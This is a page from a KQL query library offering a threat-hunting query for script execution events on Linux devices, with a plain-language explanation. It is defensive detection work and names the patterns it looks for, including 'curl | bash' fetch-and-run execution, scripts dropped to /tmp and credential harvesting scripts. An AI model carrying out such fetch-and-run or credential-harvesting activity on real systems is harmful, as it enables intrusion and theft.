KQL Search

Query Details

HomeAI ToolsDevice Query

Linux Script Activity Script Content

Query

## Linux – Script Activity (ScriptContent) – Last 24h

### Purpose

High‑signal query for **script‑based execution**, one of the most common Linux attack techniques.

### Query

```kql
let LinuxDeviceIds =
    DeviceInfo
    | where OSPlatform == "Linux"
    | distinct DeviceId;
DeviceEvents
| where Timestamp > ago(24h)
| where DeviceId in (LinuxDeviceIds)
| where ActionType == "ScriptContent"
| project
    Timestamp,
    DeviceName,
    FileName,
    FolderPath,
    InitiatingProcessFileName,
    InitiatingProcessCommandLine,
    AdditionalFields,
    ReportId
| order by Timestamp desc
```

### Use this for

* Detecting `curl | bash` patterns
* Identifying inline or downloaded scripts
* Investigating admin misuse or credential harvesting scripts
* Understanding attacker intent (script logic is often exposed)

### Typical activity you’ll see

* Shell scripts executed by `bash`
* Scripts dropped to `/tmp`
* Inline script execution via CLI tools

Explanation

This query is designed to monitor and detect script-based activities on Linux devices over the past 24 hours, which is a common method used in Linux attacks. Here's a simplified breakdown of what the query does:

  1. Identify Linux Devices: It first identifies all devices running Linux by checking the operating system platform in the DeviceInfo table and collects their unique identifiers (DeviceId).

  2. Filter Recent Script Activities: It then looks into the DeviceEvents table to find events from the last 24 hours (Timestamp > ago(24h)) that are related to script execution (ActionType == "ScriptContent").

  3. Focus on Linux Devices: The query ensures that it only considers events from the Linux devices identified earlier.

  4. Extract Relevant Information: For each relevant event, it extracts details such as the time of the event, device name, file and folder paths, the process that initiated the script, and any additional fields or report IDs.

  5. Order by Time: Finally, it sorts these events in descending order based on the timestamp, so the most recent activities appear first.

This query is useful for detecting patterns like curl | bash, identifying scripts that are either inline or downloaded, investigating potential misuse by administrators, and understanding the intent of attackers by analyzing the logic exposed in scripts. Typical activities detected might include shell scripts executed by bash, scripts placed in temporary directories like /tmp, and inline script execution using command-line tools.

Details

Nathan Hutchinson profile picture

Nathan Hutchinson

Released: February 2, 2026

Tables

DeviceInfoDeviceEvents

Keywords

LinuxDevicesDeviceInfoDeviceEventsTimestampDeviceNameFileNameFolderPathInitiatingProcessFileNameInitiatingProcessCommandLineAdditionalFieldsReportId

Operators

letwheredistinctinprojectorder byago

Actions